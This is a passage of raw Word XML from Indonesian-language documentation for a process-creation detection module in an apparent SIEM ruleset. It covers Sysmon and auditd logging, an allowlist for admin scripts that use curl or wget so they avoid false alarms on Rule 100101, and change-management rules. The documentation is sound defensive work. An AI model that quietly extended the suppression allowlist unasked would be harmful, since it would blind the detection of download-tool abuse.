        <w:t xml:space="preserve"> dapat bekerja secara optimal dengan efektivitas 100%, seluruh agen Windows wajib mengaktifkan modul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Microsoft Sysmon (Event ID 1: Process Creation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dengan opsi pencatatan Command-Line lengkap. Pada agen Linux, modul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Linux Auditd (`auditd`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> wajib diaktifkan untuk mencatat syscall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Pemeliharaan Allowlist Script Administratif (Known-Good):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Jika tim operasional IT internal memiliki skrip pemeliharaan sah yang menggunakan perintah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, skrip tersebut wajib dipetakan jalurnya (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>absolute path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) dan didaftarkan pada file pengecualian supresi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>080-suppression.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Klasifikasi S4: Maintenance Window), sehingga tidak memicu false alarm pada Rule 100101.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Audit Kepatuhan GRC:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Setiap penambahan pola pencocokan biner baru pada modul ini wajib melalui mekanisme persetujuan change management dan dicatat dalam riwayat audit tata kelola pada </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>095-governance-log.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</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File Ruleset Utama: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ruleset/rules/020-process.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• File Ruleset Prasyarat: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ruleset/rules/001-base-normalization.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• File Ruleset Korelasi Hilir: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ruleset/rules/070-correlation.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Berkas Analisis Forensik Terkait: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/laporan FP_TP/52002.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52004.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31110.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Berkas Spesifikasi Arsitektur: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/ARCHITECTURE.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan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